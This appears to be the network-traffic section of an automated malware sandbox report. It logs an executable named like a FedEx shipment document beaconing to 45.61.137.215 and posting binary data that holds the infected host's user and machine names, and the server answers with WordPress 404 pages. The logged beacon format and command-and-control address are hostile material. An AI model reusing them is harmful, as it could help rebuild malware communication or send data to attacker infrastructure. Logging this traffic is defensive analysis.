May 22, 2024 22:03:32.898025990 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:32.900181055 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:32.913120031 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:32.913181067 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:32.918093920 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.089167118 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.089694977 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.089839935 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.093080997 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.093094110 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.093141079 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.093193054 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.096280098 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.096292973 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.096304893 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.096317053 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.096347094 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.096369982 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.096424103 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.098522902 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.098586082 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.099438906 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.099482059 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.099888086 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.099899054 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.099925995 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.102155924 CEST	80	49745	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.102205038 CEST	49745	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.234183073 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.283338070 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.283407927 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.285873890 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.335769892 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:36.335956097 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:36.340884924 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.642385960 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.642401934 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.642497063 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.642570019 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.644232035 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.644283056 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.646214008 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.646225929 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.646270037 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.650084019 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.650132895 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.652012110 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.652024984 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.652060986 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.655905008 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.655926943 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.655967951 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.655991077 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.661478043 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.661520004 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.665791035 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.665802956 CEST	80	49746	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.665853024 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.667408943 CEST	49746	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.779932022 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.784871101 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.784955025 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.786935091 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.835906029 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:39.836019993 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:39.840923071 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.835977077 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.836977959 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.837066889 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.839385033 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.839488029 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.841876030 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.841892004 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.841902018 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.841949940 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.841990948 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.846730947 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.846785069 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.849127054 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.849138975 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.849191904 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.849191904 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.851085901 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.851099968 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.851138115 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.854994059 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.855012894 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.855025053 CEST	80	49747	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.855083942 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.855083942 CEST	49747	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.989563942 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.994652987 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:42.994736910 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:42.997267962 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:43.047914028 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:43.047991037 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:43.052922010 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.146816969 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.147844076 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.147958994 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.150197029 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.150209904 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.150324106 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.152543068 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.152556896 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.152570963 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.152642012 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.157201052 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.157325029 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.159548044 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.159567118 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.159714937 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.160512924 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.160523891 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.160649061 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.164232016 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.166098118 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.166275024 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.170928001 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.218779087 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.236629963 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.237168074 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.237848043 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.238626957 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.238651037 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.238698006 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.247029066 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.247055054 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.247067928 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.247078896 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.247092962 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.247106075 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.247106075 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.247118950 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.247152090 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.249748945 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.249763012 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.249806881 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.251863956 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.251878023 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.251914024 CEST	49748	80	192.168.2.7	45.61.137.215
May 22, 2024 22:03:46.299875975 CEST	80	49748	45.61.137.215	192.168.2.7
May 22, 2024 22:03:46.299922943 CEST	49748	80	192.168.2.7	45.61.137.215

HTTP Request Dependency Graph

45.61.137.215

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49704	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:01:39.996237993 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 192 Connection: close
May 22, 2024 22:01:40.048728943 CEST	192	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: 'ckav.rufrontdesk841618FRONTDESK-PCk0FDD42EE188E931437F4FBE2Cj2Q9P
May 22, 2024 22:01:42.994126081 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:01:40 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:01:42.996242046 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 22, 2024 22:01:43.001065969 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 22, 2024 22:01:43.005872965 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 22, 2024 22:01:43.005886078 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
May 22, 2024 22:01:43.005896091 CEST	672	IN	Data Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
May 22, 2024 22:01:43.015408039 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:01:43.019284964 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:01:43.019305944 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:01:43.019315004 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49707	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:01:43.233365059 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 192 Connection: close
May 22, 2024 22:01:43.284064054 CEST	192	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: 'ckav.rufrontdesk841618FRONTDESK-PC+0FDD42EE188E931437F4FBE2CdiCaT
May 22, 2024 22:01:47.036700964 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:01:43 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:01:47.038836002 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:01:47.043613911 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:01:47.048432112 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 22, 2024 22:01:47.048445940 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
